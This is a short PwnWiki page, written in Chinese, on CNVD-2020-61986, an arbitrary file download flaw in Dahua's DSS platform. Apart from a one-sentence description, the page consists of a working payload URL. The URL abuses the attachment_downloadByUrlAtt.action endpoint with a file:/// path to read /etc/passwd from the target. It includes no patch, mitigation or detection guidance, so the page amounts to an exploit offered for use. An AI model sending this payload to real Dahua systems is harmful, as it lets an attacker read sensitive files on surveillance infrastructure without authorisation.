CNVD-2020-61986 大華DSS系統任意文件下載漏洞

From PwnWiki

This page is a translated version of the page CNVD-2020-61986 大華DSS系統任意文件下載漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎中文（中国大陆）‎ • ‎中文（台灣）‎

漏洞簡介

浙江大華技術股份有限公司DSS存在任意文件下載漏洞，攻擊者可利用該漏洞登錄界面下載任意文件獲取敏感信息。

Payload

http://ip/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2020-61986_大華DSS系統任意文件下載漏洞/zh-tw&oldid=6973"